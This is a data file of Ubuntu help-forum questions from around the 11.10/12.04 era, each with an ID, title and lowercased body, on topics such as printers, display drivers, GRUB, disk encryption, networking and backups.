112927	add new printer disabled - grayed out using gnome shell	i 'm running gnome shell in ubuntu 11.10 . when i go to gnome control center and click on printers , the add new printer button is grayed out ( disabled ) . when i logged into unity , i added the network printer with no problem , and the printer remained when i logged back into gnome classic ( gnome shell ) . however , i am not able to add any further printers ; the + and - buttons are grayed out . how do i fix this permanently ? thanks !
112930	same folder , different size	i am trying to move a big folder ( 15gb ) from a ntfs external hdd to my laptop running ubuntu 11.10 . in order to be sure that i was copying the correct folder , i double checked the size of the relevant folder first connecting the hdd to a windows7 machine , showing 15gb / 7675 files , then performing the same task after connecting the hdd to my laptop . to my surprise , im the latter case , the size goes up to 16.2gb with 0ver 7800 files . could you kindly explain to me the reason for this ? am i missing something or doing something wrong ? is it filesystem related ?
112932	which distro should i use on an ibm thinkpad t41 for speed ?	i am planning to install ubuntu on my old laptop - ibm thinkpad t41 . the laptop has 1 gb ram , 50 gb hard disk , 1.6-ghz pentium m processor and 32mb ati mobility radeon 9000 graphics card . i would prefer to install and run ubuntu with unity 2d on this system , but would also want my system to be fast and responsive . my question is this : will the unity 2d interface run fast on this system , or should i install xubuntu or lubuntu instead ? thanks .
112934	why is metacity still my display manager instead of awesome ?	i am trying to stop using unity and make awesome my default display manager while still having gnome as my default desktop environment . i am following the instructions at this page . i did however base my gnome session on the gnome classic session . i created the following files : /usr/share/gnome-session/sessions/gnome-nounity.session : [ gnome session ] name=gnome no unity requiredcomponents=gnome-panel ; gnome-settings-daemon ; requiredproviders=windowmanager ; notifications ; launcher ; panel ; defaultprovider-windowmanager=awesome defaultprovider-notifications=notify-osd defaultprovider-launcher=unity-2d-launcher defaultprovider-panel=cairo-dock isrunnablehelper=/usr/lib/gnome-session/gnome-session-check-accelerated fallbacksession=gnome-fallback desktopname=gnome /usr/share/applications/awesome.desktop : [ desktop entry ] version=1.0 type=application name=awesome comment=the awesome launcher ! tryexec=awesome exec=awesome /usr/share/xsessions/gnome-nounity.desktop [ desktop entry ] name=gnome classic no unity comment=this session logs you into gnome with the traditional panel exec=gnome-session -- session=gnome-nounity tryexec=gnome-session icon= type=application x-ubuntu-gettext-domain=gnome-session-3.0 i am choosing gnome no unity at login . but somehow metacity will keep starting . is there something wrong with my configuration ? or is there some other reason metacity is starting . maybe gnome-fallback is launching , but why and how to check ? please help me out , i really do want my display manager to be awesome ; )
112937	error with xorg.conf when trying to add virtual screen to fix the problem of too small screen resolution for an application on 10.1 '' screen	i am using a netbook with a 10.1 inch screen and resolution 1024x600 . i am running ubuntu 10.04 lts and when using the neural network toolbox from matlab a window is off the screen and i can not access the buttons . i found this answer on superuser link , which describes two approaches . first to press alt while moving the window off the screen upwards so that the bottom part is visible and accessible . the next option is to add to the xorg.conf file virtual 1024x800 there was no such file in /etc/x11/ so i created it and there were problems at reboot so the default was used . is there a solution along these lines for ubuntu ? i suspect that there might be a solution using xrandr .
112948	is there an application that is like `` time machine '' on the mac osx ?	if there is an application , does it work like `` time machine '' where it save backups of your computer and if wanted , go back to an earlier time on the computer for example where an virus was not there ? here is an definition of time machine that apple wrote : time machine is the built-in backup that works with your mac and an external drive ( sold separately ) or time capsule . connect the drive , assign it to time machine , and start enjoying some peace of mind . time machine automatically backs up your entire mac , including system files , applications , accounts , preferences , music , photos , movies , and documents . but what makes time machine different from other backup applications is that it not only keeps a spare copy of every file , it remembers how your system looked on any given dayâso you can revisit your mac as it appeared in the past .
112950	change player in sound indicator in unity	i was wondering if there is anyway to change the player in sound indicator in unity.i have checked previous questions for my issue , but i was n't able to make the change .
112957	display works fine in livecd but not in full installation	installing 11.10 on an old server with bare-bones graphics adapter . i 'm working with a frankenstein monster of hacked-together donated parts to build a system in nicaragua . livecd works great . displays in 1280 x 1064 mode . when we try to install directly on the server , the installation seems to go fine , but when i reboot , i get past the bios screen and immediately get the dreaded `` can not display this video mode '' error . i 'm sure it can display the video mode , because it did on the live cd . i ca n't even get to the splash screen to go to restore mode . any thoughts on how to get this working ?
112958	gnome shell - can i install alongside unity	im currently using ubuntu 11.10 ( on mac on virtual box ) and thinking of installing gnome shell because of its similarity with mac interface . if i install gnome shell will i need to reinstall printer , webcam drivers , etc. ? also , will i be able to switch back and forth between unity & gnome shell .
112966	recurring lsb-release and software center glitch after installing mate	i just recently upgraded to ubuntu 11.10 . not a fan of unity , so i decided to try out the mate desktop from linux mint . i added the mint repository , grabbed and installed the mate packages , and got rid of the repo so i would n't be downloading any other mint packages . i did have some glitches with the packages ( missing dependency stuff ) , but i fixed it . as other users have reported , installing mate temporarily breaks the ubuntu software center because lsb_release shows the machine as linux mint rather than ubuntu . i can fix it as noted in this answer by editing /etc/*release and /etc/*issue . problem is , this only works until i reboot the machine . every time i reboot , /etc/lsb-release and /etc/issue revert to linux mint , breaking software center again until i edit them , again . can anyone help me pin down what keeps changing these files ? much appreciated , thanks . rephrasing the crux of the problem : where do /etc/lsb-release and /etc/issue get their info from ? what would cause them to be revised on reboot ?
112967	install .deb on from cd-rom while offline with default applications only	i have an application with a .deb package to install it . if the user is online , everything works fine . however , i need to support installing on offline computers from a cd-rom , and i can only assume default applications are installed , i.e . i ca n't tell them , `` first download xyz and then it will work . '' my cd-rom needs to be self-contained . ( users have little or no internet connectivity ... think `` jungles of papua new guinea . '' ) the cd-rom includes all the necessary dependency packages , assuming a stable base install of the operating system . this is for 11.10 . ( hopefully it does n't all change again in 12.04 . ) i have tried : ubuntu software center - the `` install '' button is disabled if you are offline . this is true even if you add the cd as a software source . using dpkg directory - this does not resolve the dependencies . i would never be able to explain to our users how to manually resolve the dependencies in a command line . some of the tools that would help ( keryx , gdebi , aptoncd , synaptic ) are not included in the default install of 11.10 . is there any way to tell aptitude to get and resolve packages from a cd-rom while offline ? basically , if a user out in the middle of nowhere installs ubuntu from a plain ol ' desktop cd , he should then be able to install my application from a different cd . what needs to be on that cd to make that possible ?
112968	automatically disable wifi ( wireless ) when wired ?	what 's the best way to automatically disable my wifi/wireless connection whenever i plug in a wired ethernet cable ? i 'd like it to be re-enabled when i later unplug the wire . also , i sometimes like to share the wired connection with other wireless users ( or vice-versa ) . it 'd be nice if i could somehow exempt these setups . i 'm using 11.10 oneiric , which uses networkmanager .
112972	dual monitor setup on 11.10 without xinerama amd/ati prop . drivers series radeon 9800	i noticed that using ati/amd radeon 9800 series card and enabling dual monitors with xinerama , video 3d acceleration does n't work any more . so i disabled xinerama and 3d acceleration is back . however , the second monitor , while x display manager ( or something ) seems to detect it -- it is on and i can move my mouse to it , and right click but there is no desktop gui on it . how do i enable another window manager or desktop gui on the second monitor , or conversely , how do i enable xinerama with working 3d acceleration ? this is my current xorg.cong file section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 1 ] -0 '' 0 0 screen `` amdcccle-screen [ 1 ] -1 '' rightof `` amdcccle-screen [ 1 ] -0 '' endsection section `` module '' load `` glx '' # load `` fglrx '' endsection section `` serverflags '' option `` xinerama '' `` off '' endsection section `` monitor '' identifier `` 0-dfp3 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1680x1050 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp4 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1200 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-dfp4 '' `` 0-dfp4 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -1 '' driver `` fglrx '' option `` monitor-dfp3 '' `` 0-dfp3 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` default screen '' defaultdepth 24 subsection `` display '' endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -0 '' device `` amdcccle-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -1 '' device `` amdcccle-device [ 1 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
112975	how to know the history of changes made with motherboards in ubuntu ?	i am working on ubuntu os . initially my pc configuration was intel core 2 duo 3.0gh with 320 gb hdd . after some times , my friend changed the motherboard with lower version of configuration without changing the hdd . still the ubuntu os is working fine and all data is safe . i want to know that from where i would know the previous mac address ( the machines physical address ) ? does the system keep any log file in hard disk ? if yes , then how to know ? please help
112992	ubuntu machine not responding to ping from windows machine on same network	i want to fix this because it seems the reason why i can not share ubuntu folders with my windows machine . windows 7 machine network configuration : ip : 192.168.2.2 subnet mask : 255.255.255.0 gateway : 192.168.2.1 dns : 8.8.8.8 , 4.4.4.4 ubuntu machine network configuration : ip : 192.168.2.3 subnet mask : 255.255.255.0 gateway : 192.168.2.1 dns : 8.8.8.8 , 4.4.4.4 i can ping my windows machine from ubuntu but i can not ping my ubuntu machine from windows . any suggestions ?
112996	good way to run java and eclipse from a ramdisk	it is often suggested to me that to improve the performance of the eclipse development environment , that i should move the java jdk/jvm ( and possibly eclipse ) to a ramdisk . i know that the ubuntu has this /dev/shm device always available , but whats the right way to set up a ram disk with java on it that will be there everytime i boot up ?
113001	how can i make ubuntu more responsive on a netbook ?	i have ubuntu 11.10 installed on my asus 1015pem ( atom n570 ) . the interface seems pretty sluggish , compared to what i remember it being with ubuntu 10 using metacity . what 's the easiest way to increase the responsiveness of the system and the ui ?
113002	lost windows 7 files	my intention was to have a dual boot system with ubuntu and windows 7 . obviously i did something wrong because although i had a system menu on booting ( is it normal to appear dos-like ? ) which gave me an option of booting into windows 7 , i was unable to do so . also , when i booted into ubuntu , my windows 7 drive was not available . the windows 7 drive was an internal 1tb drive partitioned into a 200gb ( os ) and a second partition making up the remainder . i was still unable to access this windows 7 drive even after deleting ubuntu as i kept getting an 'requires an ntfs drive ' error , or something similar . i could not even re-install windows 7 as the disk was not recognised . i did eventually get the drive back by but i can not for the life of me remember how . i did try to recover my lost w7 data using ontrack easy recovery ( which has always been succesfull in the past for post format recovery ) but it would not recognise the 1tb although it was now formatted as ntfs . from other posts on this site , i gather that this is considered a 'windows 7 site ' problem by linux users . however , i would dearly love to recover some of my lost windows 7 files . i had resigned myself to a lot of lost personal data but i happened to notice that a 2tb drive i had connected through a usb docking station had been repartitioned . it must have happened when i installed ubuntu as i can think of no other explanation . i certainly do not remember consciously requiring ubuntu to do this . the additional two partitions on the 2tb drive , the original windows
113004	thunderbird keeps asking for password even if the password is correct	i 'm using thunderbird-11 on ubuntu 12.04 . recently after an update suddenly thunderbird is no longer able to recognize my password and keeps asking for it with the message `` login failed - retry '' . i know my password is correct because my calendar in thunderbird which uses the same password and my webmail is able to take that password . i 'm connecting to a 2010 outlook exchange using imap . tried deleting key3.db signons* , removing saved password , reinstalling thunderbird but nothing helped . not being ale to send mails is frustrating : - ( ! !
113015	no proprietary drivers after enabling ldap login ?	i have a 10.04 workstation that was running compiz with restricted nvidia drivers . i setup pam to use ldap authentication and mounted /home on nfs . i can now login via ldap with nfs homes , but my restricted drivers are gone , and the hardware drivers tool does n't show any restricted drivers as being available . how do i get restricted drivers working again ?
113021	how to change the font size of preview options when using an input method ?	i 'm using ibus for pinyin in 11.10 . a previous askubuntu poster mentioned that s/he increased font size to 14 point in preferences . i 'm unable to find a setting in preferences that allows me to do that . the chinese characters in the preview box are way too small and barely legible now . just to be clear , this is not about the chinese text produced in an application program , it is specifically about the size of the five `` candidate '' chinese characters that ibus offers me for selection .
113022	share ppp0 internet connection via wireless modem	i have a wireless router / adsl modem and a 3g card that i use to connect to the internet over ppp . i want to be able to share my internet connection ( ppp0 ) to my laptop via the wireless router . so my setup looks like this : desktop : internet < = ( ppp0 ) = desktop = ( eth0 ) = > adsl router now from my laptop , i want to connect to my adsl router ( which has built-in dhcp , not sure if that is a problem ) , so that i can use the internet connection on the desktop . laptop = ( wlan0 ) = > adsl router = > desktop = > internet hope this makes sense .
113027	will the ubuntu one music store be available for banshee in 12.04 ?	i heared that rhythmbox will replace banshee as the default music player in precise . however , i was still surprised not to find the ubuntu one music store plugin for banshee in precise . it has been available from lucid , where rhythmbox was also the default music player , so i would not have expected it to be discontinued as a result of that switch . so will the u1 music store be available in the final version of precise , or is it dropped completely ?
113028	ambiance theme nautilus grey files selected	i do n't know if it 's a clone of anything , but i still did n't really find an answer . on ubuntu , the ambiance theme works perfectly fine , except on nautilus . files selected inside nautilus show as grey , as if the window is n't focused , even when it is . the selection rectangle , however , retains the orange color on the desktop , it seems to have the right theme i tried other themes too , and the only one in which it does n't seem to happen is adwaita . is it something in the theme itself then ? how can i correct this ? i ca n't seem to be able to find an answer . -amir p.s . while these pictures are taken in gnome shell , the same happens under unity .
113029	ubuntu 11.0 wo n't boot up	long story , but it began on windows 7 . it would slow down , then freeze , then crash . i would restart the computer , and sometimes it would say `` no os detected '' , so i recovered it . when i did that , i was still running into problems , so i just loaded ubuntu as a dual boot . when i did this , my computer ran smoothly , and i did n't have a single problem , until i shut it off . now , windows 7 is non-existent , and ubuntu wo n't boot . it gives me an option to go into recovery , but when i get there , it wo n't finish booting . it gives a few lines of errors , and gives me something of a command terminal which says ( initramfs ) . most codes such as `` sudo '' or `` exit '' will not do anything , in fact , my computer freezes when i type exit . when i set up a dual boot , i used the setup menu that ubuntu gave me . i 'm not exactly sure which version i 'm running , only that it is somewhat current . help would be much appreciated , even if your advice is to get a new computer . thank you .
113030	install of ubuntu 10.4 lts on dell laptop	i got ubuntu 10.4 lts to install and run ok on an old dell inspiron , after overcoming an initial command line prompt and then foolishly upgraded to 12.x beta and that did n't see my home wireless network . so , i reinstalled back to 10.4 lts , but now do n't boot to gui ( as in first case ) but get a `` grub > '' prompt in a command window . i have no idea of how to get the gui to boot up . help please . the initial installation booted to gui ok , after an initial boot to command window . i overcame that with test install and then reinstall , though i got some out of disk space errors .
113031	how do i change screen contrast ?	the contrast on my laptop 's screen is not enough for me.. do you know how to change screen contrast in ubuntu 11.10 ? i 've tried xcalib and f.lux , but it is n't what i 'm looking for .
113033	prints only go to queue	new linux user . old printer removed as not supported , replaced with hp desktop 1000 . this has worked for several weeks . yesterday all attempts to print a document went to a queue , nothing prints out . paper in place , power light on , front gate open , cables in place .
113043	how can i watch dvd movies using ubuntu for the first time ?	i 'm a new user of ubuntu , i '' m impressed with the support , but i ca n't watch dvd movies on my ubuntu computer , what can i do to solve this problem ? also i read this message : `` could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . i already installed dvd decryption ... .thanks
113044	internal mic not working on aspire one d255	i ca n't get my internal mic to work with any app other than sound recorder . i 've scoured the other posts on this topic and none seem to have an answer . i 've installed alsa mixer , pulse audio controls , tried minimising one of the stereo channels but nothing works . the mic is not muted . there is no function key on the keyboard to mute the mic either . the only connector options are analogue mic or analgue input . neither do anything .
113051	can i trust in x/swat ppa ?	this is the repository for get the lastest nvidia propietary . im not happy with the repos one because im having problems with unity , sometimes it lags and freezes . but i want to know if i should trust . what do you say ?
113053	wireless seems to disconnect and reconnect	whenever i 'm browsing or downloading , i 'll randomly get these long spikes of no internet connectivity . it only happens in ubuntu versions like ubuntu , xubuntu , kubuntu and so on . tried on arch and my internet was fine the whole day . what should i provide ?
113056	how can i lock and unlock a screen during certain times of the day ?	i 'm using a low power pc as a updating status screen , using firefox at fullscreen mode and a plugin called `` reload every '' . m-f from 8 am to 6 pm , i need the app set to no-screensaver and no-screenlock every other time i want the screen locked . the purpose is basic security when no one else is around . i do n't have to use gnome-screensaver to accomplish these goals . i just want to disable and enable the keyboard , mouse and screen without entering in a password , automatically . i was thinking of using cron and a shell script or python to swap a config file , but the gnome-screensaver man page is a bit lacking , and i have no idea what it uses for configuration .
113059	back up from windows to ubuntu	i 've recently installed ubuntu along side of win7 on a netbook . i want to back up all my information from windows , so i can switch to ubuntu only . any advice ?
113061	will virtualbox recognise a usb device if ubuntu does n't recognise	i am running windows xp as a virtual machine through virtualbox on ubuntu 11.10 . i have some usb devices ( namely a video grabber & android phone ) that are n't recognised by ubuntu . will they be recognised by windows xp if it is running virtually ?
113078	ubuntu one login problem from android	my ubuntu one account get login correctly by firefox and nautilus . my account has a 16 char password , with alphanumeric and special chars . it happens that downloading the ubuntu app in my mtk6573 hd7 ahd7300 android phone , i can not login with the usual password . is there a problem in the android app , not allowing special chars ?
113082	skype on 11.10 x64	why skype crashes on 11.10 x64 architecture ? and why the weird font ? why its not using the system font , like it 's set in options ? the same problem is in 12.04 , but that 's forgivable for pre-realese verson ...
113084	what software can i use to access silc networks ?	i want to access a silc network and all the infos from the official site are missing ( site down ? ! ? ) edit : it seems the site is back up as of last week . good thing that i got curious and checked it again .. so what software ( still ) exists to access a silc network ? also as complimentary questions : do you have infos on publicly accessible silc servers ? what software can one use to run a silc server ? ( i ask since the main website is down )
113085	how does grub2 process these entries ?	i 'm trying to get grub2 to boot by xen image off of a usb thumb drive . however , it 's not working for some reason . my original grub entry was the following , and this works off of an lvm partitions hdd : menuentry 'xen 4 ( linux 2.6.32.50-xen ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os -- class xen { recordfail insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 6542fe50-82e2-467a-b832-7cf92f71bc98 multiboot /xen.gz placeholder noreboot module /vmlinuz-2.6.32.50-xen placeholder root=/dev/mapper/xenserver-root ro module /initrd.img-2.6.32.50-xen } but , not off the thumb drive which is partitioned as ext2 with no lvm . currently it looks like this : menuentry 'xen 4 ( linux 2.6.32.50-xen ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os -- class xen { recordfail insmod ext2 set root= ' ( hd0,1 ) ' search -- no-floppy -- fs-uuid -- set 55425e50-82e2-4c74-b860-7cf92f91b423 multiboot /xen.gz placeholder noreboot module /vmlinuz-2.6.32.50-xen placeholder root=/dev/sda1 ro module /initrd.img-2.6.32.50-xen } the way i understand this is that set root= ' ( hd0,1 ) ' sets the root environment variable to be the first hard disk , first partition . now , what does the search line do ? according to the grub2 documentation for the search command and if i 'm understanding it correctly , if a disk with that uuid is found it will set root to that uuid ... or is that the first partition on that disk ? ? so if it does n't find it does that mean it defaults to ( hd0,1 ) ? this is currently not working for me it says i need to load a multiboot kernel first . so it 's obviusly not finding xen.gz . could it be that i need to remove the -- no-floppy ? i know some bios ' treat usb thumb drives as floppy disks . although on my system it 's coming up as /dev/hda . if it insert a hard disk it 's /dev/hdb . is this still going to work ? what should i set the root= line to given that lvm is not installed and /dev/mapper/xenserver-root does n't exist . i 've seen some people set this to /dev/hdb1 but i 'd like it to figure this out automatically or be generated by update-grub . how would i get this working ? i 've tried lots of options , but obviously not the right one .
113092	unhandled lockdown error ( -4 ) ipod 4g	running ubuntu 10.10 getting this error as soon as i connect my ipod 4g running ios 5.0.1 . when i open nautilus , i can see the ipod icon , but same error appears when i try and open the ipod .
113097	10.04 server to 12.04 server or 11.10 server to 12.04 server ?	will 10.04 x64 server have a smooth upgrade to 12.04 x64 server ? will 11.10 x64 server have a smooth upgrade to 12.04 x64 server ? i am setting up a new production server this month , and i need to decide which to use . i have been testing software on both . 11.10 has been flawless for me , and 10.04 has been a little rocky with the same packages . i would like to be able to upgrade the server to 12.04 6 or so months after it comes out . what are your thoughts on which one to choose in regards of a smooth transition to 12.04 ?
113102	why does ubuntu release version at x.04 and x.10 ?	why does ubuntu release at versions x.04 and x.10 ? eg . 10.04 , 10.10 , 11.04 , 11.10 , 12.04 etc
113110	can '' t install anything from ubuntu software center after trying to install ubuntu restricted extras	i tried to install ubuntu restricted extras in the terminal . now when ever i try to install an app or something i get this file '' /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' line 968 , in simulate trans . unauthenticated = self._simulate_help ( trans ) what do i do ? ? ? ? ?
113112	is it possible to change a program 's privileges while running ?	is it possible to start a program normally , and then later give it root or some other level of permission without restarting it ?
113115	can not change the files	i have files kept under the folder /opt/ . when i am trying to edit the files , could not because the permission is denied . how to give the permission ?
113117	is it ok to install python 3.2 in 11.10 ?	i 'm just wondering if it is okay install the package python3.2 from ubuntu 's repositories ? . i have been so unlucky with ubuntu lately , that i 'm afraid to do anything because everything seems to break my system . the point is that i want to learn python 3 , but without breaking the python dependencies of my system . sudo aptitude install -s python3.2 does n't show any conflicts , but still i prefer to ask . thank you in advance .
113122	prevent a window from being active on screen directly after being launched	is it possible with ubuntu oneiric to choose if a window/application will be `` active on screen '' or not once it is launched ? once upon a time , i was using debian and i could choose not ( ie every new application launched would open in a window that would nicely wait until i click on it to be on screen ... . ) i have looked for the same for ubuntu oneiric but i ca n't find this option ... . indeed my problem is : i work ( a looooooooooot ! ) with a matlab program that will open quite some new graphic windows once it is launched . and i would like to be able to keep using my laptop while it is running this program , and for that i need the windows not to be active on screen and prevent me from using my laptop ... . any help would be most welcome ! ! thanks ! lucile edit : sorry english is not my mother tongue ... @ jo-erlend schinstad : by active on screen i meant `` open in focus '' i need the graphic windows from matlab to open ( so that i can save the graphics ) but not to appear on screen , on top of the window i am using at that moment , and then preventing me to use my laptop while the pg is running ... . ( hope this is clearer ... . ) @ yossile : i did not figure out how to comment your post so : thank you for your very clear answer but ... . i still ca n't make it work ... i followed your instruction step by step but still if i run the matlab program and then use mozilla firefox for example , the graphic windows still open on top of the firefox window , preventing me to use it . for the details : i added the following value in focus prevent window ( thanks to the grab button ) : & class=com-mathworks-util-postvminit i 've also tried & name=sun-awt-x11-xframepeer & title=matlab r2011b ( and i tried with window type , role and id but for those i could n't grab the value automatically with the grab button ) so if you have any other suggestion i would be very grateful to hear it : - ) ( a big thank you anyway )
113124	how to install window decorations from file ?	i got some window decorations from kde-look.org and i went into settings to change it but it does n't give me the option to install decorations from file . how do i do so , if it 's even possible ?
113126	is it possible to convert an isz to an iso image ?	what steps are necessary to convert a .isz file ( compressed iso image ) to a standard iso image using ubuntu ?
113133	desktop environment alternatives for laptops	which desktop environments are better to install in a laptop ? . i 'm looking for customisation , high performance , good use of space , ...
113135	how to resize a /home partition in kubuntu ?	i was distro hopping for awhile in the past few months , so in order to keep all of my files secure , i made a partition of around 50 gb named files to store all of my files in , and still have them for quick and easy access . however , now that i 've found a distribution i 'm comfortable with ( kubuntu 11.10 ) , i would like to remove this partition , and have all of my files in my /home folder , in order to more easily deal with these files . i 've moved all of my files in the partition to my /home folder ( and still have plenty of room to spare ) , and now i 'm trying to delete the partition and use the space for my /home folder . i can delete the partition just fine , however , i ca n't extend the /home folder into the unallocated space . here 's a screenshot of what i 'm talking about . in order to change the size of the /home partition , i need to unmount it . but , i am unable to unmount it ! how do i best extend the size of the partition ?
113138	how to share wireless internet with ubuntu ?	i have a pc which connects to the internet via wifi . however , my isp only allows one pc to connect to the internet at the same time . also , i have a wireless router , so i want to connect this router to my laptop and share my internet connection via this router . is there any way i can do that ?
113139	backup keeps asking for encryption password while restoring	i 'm attempting to restore from a previous backup but the restore keeps asking me for an encrypted password . i enter what i want it to be but it shows up some thirty seconds later to ask again . why is this ?
113140	how to configure keyboard to type in ipa fonts ?	i am using 11.10 as my only os , now i have to do some typing in ipa , but it is turning out to be a headache . i tried using autohotkey but it failed to yield desired results . please let me know if there are any softwares through which i can type in ipa or to manipulate my keyboard entries .
113141	error 12 - creating hibernation image - not enough free memory	ubuntu 11.10 thinkpad t61p with 120 gb free disk space and 2 gb memory . i got this error message while trying to activate hibernation mode . not enough free memory error 12 - creating hibernation image is this a bug or what may i do to have hibernation and sleep mode working properly ? edit : total used free shared buffers cached mem : 1996 1450 545 0 139 359 -/+ buffers/cache : 951 1044 swap : 2027 0 2027
113143	blank mails problem in thunderbird	i have configure gmail imap account in thunderbird ( 10.0.2 ) on ubuntu 11.04 . all things was working fine , one day i found blank mails in my local sub folder which have filter to download mail from imap indox to local inbox . no subject no body no person name , nothing just a size i have that only 0.1k . and sometime when i try to drag and drop mails from imap to local , this happen without any notification . i move these mails from imap to local folder that means i never find these mail in imap account . so i just lost my mail . my question is that why this happened , i dont want this will happen with again and how can i recover those blank mail in thunderbird . thanks in advance .
113144	can i open .debs with synaptic in 11.10 ?	ubuntu software center is very slow here.seriously , windows virtual machines run faster that that here ! i dislike software center so i installed synaptic ages ago , and that loads in 2 seconds ! perfect . well almost - i ca n't seem to open downloaded .debs with it . can i change things so that synaptic opens .debs by default ? is it possible to remove software center completely and replace it with synaptic ?
113157	how do i set terminal as part of my wallpaper ?	i have spent the last few days wiping my laptop ( too much `` experimenting '' ) and getting up to date with 11.10 . in the process , i came across conky which i 'm now playing with , and along with conky i saw some amazing desktop set-ups . among one of these was one that had the terminal shell as a transparent almost part of the wallpaper . i would like to know how to do this so that there are no window borders or title bar . just seamless on the background . i know how to adjust the background settings of terminal itself but not matter how transparent you make it the window still has a border . thank you in advance .
113159	is there a standalone version of soapui for linux ?	i want to run soapui on ubuntu 11.10 . if i am not able to install via the package manager , i 'd prefer not to install at all , and instead run as a standalone application . looking at the soapui download page i ca n't figure out which download ( if any ) fulfills this criterion ? soapui-4.5.0-beta1-linux-bin.zip soapui-x32-4_5_0-beta1.sh i 'm guessing `` bin '' but i do n't know for sure . any clues ?
113161	how to setup postfix for multiple domains	i have multiple domains and i want to install postfix to send emails only . how can i set it up on my vps ?
113168	is there a graphical ( gui ) front end for hdparm ?	is there a graphical ( gui ) front end for hdparm to configure spin down for my hard drives in ubuntu 11.10 ?
113169	screen resolution is 1920x1080 already , but it still does n't fit the screen	i just did a fresh install . after installing the restricted video card driver , the screen shrunk even though the resolution is set to 1920x1080 . there are black corners around the screen , so i 'm pretty sure it 's not utilizing all the space . what should i do to fix this ? if it helps , my computer is a hp h8-1180d , using hdmi as the connection to the monitor
113171	turn mousekeys on/off from keyboard	i have mousekeys turned on in the universal access menu and lots of posts as well as this documentation page : https : //help.ubuntu.com/11.10/ubuntu-help/mouse-mousekeys.html mention that numlock or shift+numlock toggles this on or off . neither of these work for me . the only way i can apparently turn this feature off is using the universal access menu , which is annoying if all i want to do is toggle it off to type a few numbers . i use mousekeys on windows and it works fine . i am running on ubuntu 11.10 and my keyboard is a ms ergonomic 4000 . i wonder if some other config setting is getting in the way ?
113172	how to view windows files on a wubi install ?	i wanted to ask , how can i view all my windows files on ubuntu . i found out how to get my d drive folders but have yet not figured out how to get my c drive files . please give me an easy way to find my files . for more information , i have installed ubuntu via wubi . please answer my question asap .
113176	luks on > 2tb disk	i have a 3tb disk which i want to encrypt . as soon as i create a file system ( mkfs.xfs or ext2-4 ) in the encrypted partition it outputs `` attempt to read block from file-system resulted in short read while creating root dir '' . if i do n't encrypt , this error does n't appear and i can use the disk like expected . i created a gpt partition table with parted like this : # parted /dev/sdb mklabel gpt mk primary 0.00tb 3.00tb quit this worked fine . i then created the crypt-container and decrypted it like this : # cryptsetup luksformat /dev/sdb # cryptsetup luksopen /dev/sdb1 storage this worked , too . now i tried to create the file system : # mkfs.xfs /dev/mapper/storage this resulted in the following error : `` attempt to read block from file-system resulted in short read while creating root dir '' . i tried to create a lvm-container and create the crypt-container inside . this works , but after copying some files on the disk it crashes and reports i/o-errors every time i try to access it . i checked the disk for errors in linux and with the seagate-tool in windows . no errors were found . i experimented by creating < =2tb crypt-partitions and managed to create file-systems without errors . but when i resize the containers it does n't work anymore .
113182	hardware logs storage ?	i have a ubuntu server 11.10 installed . wanted to know where hardware related logs are stored & is there any configuration that needs to be done , for those logs to be activated ? if possible please mention where to find the logs related to drivers of the respective hardware failuer or something related to particular driver failure ? and in case if they are stored in one single log file then how to distinguish the hardware errors or logs from drivers errors or logs ? my purpose behind this information : i am just going to keep record of all those logs and audit those logs for iso 27001 and then will send e-mails to respective server administrators for the errors that are found and errors that are occurring again and again . i am not looking for any particular hardware log here , but just would be auditing those logs and making sure that they are stored for 3 months on central storage server for future references . but still is there are any hardware related issues or errors that have occurred then would like to have then reviewed in the audit . update i am going to keep all the log files mentioned below for the audit but if any one of you think that i have to include some more log files for tracking hardware issues in the audit please suggest . : /var/log/messages : general log messages /var/log/boot : system boot log /var/log/auth.log : user login and authentication logs /var/log/daemon.log : running services such as squid , ntpd and others log message to this file /var/log/dpkg.log : all binary package log includes package installation and other information /var/log/faillog : user failed login log file /var/log/kern.log : kernel log file /var/log/mysql . * : mysql server log file /var/log/user.log : all userlevel logs /var/log/fsck/* : fsck command log /var/log/apport.log : application crash report / log file updated question title thanks a log for the support till now and thanking you all for the same ! : ) warm regards , rishee
113185	ubuntu not logging in	i am using ubuntu 11.10 and i once i logged in and the screen flashed for a sec and came back to the same screen it is happening again and again . i put the ubuntu cd and almost reinstalled it while i got this thought `` lets try again '' i tried again and luckly it came . i immediately came here without another log off and asked you guys . how do i correct it such that i wont be having problems in future ? ? ? ? ?
113188	character encoding problem with filenames - find broken filenames	i have the problem described in this q & a . probably from quite old linux distros or from windows i have several files with broken filenames . ls displays a `` ? '' instead of the broken character . i successfully renamed some of these files , but i do n't know if i 've found all of them . is there any method to find all affected files ?
113194	what will happen when the code names of the ubuntu releases get to z	the last release was natty narwhal ( letter n ) for the 11.04 . then it was oneiric ocelot ( letter o ) for the 11.10 . this time , the newest one will be precise pangolin ( letter p ) for the 12.04 . at this pace , what will happen when ubuntu gets to z . will it start with numbers ( 007 edition ) , will it start with double letters ( aa battery ) , will it start from the beginning ( amazing apple ) . what will happen ?
113196	where are screen lock configuration settings located ?	could you please point me to the place where ubuntu 11.10 keeps its screen lock settings ? using unity 3d . screen lock does not work . thanks in advance !
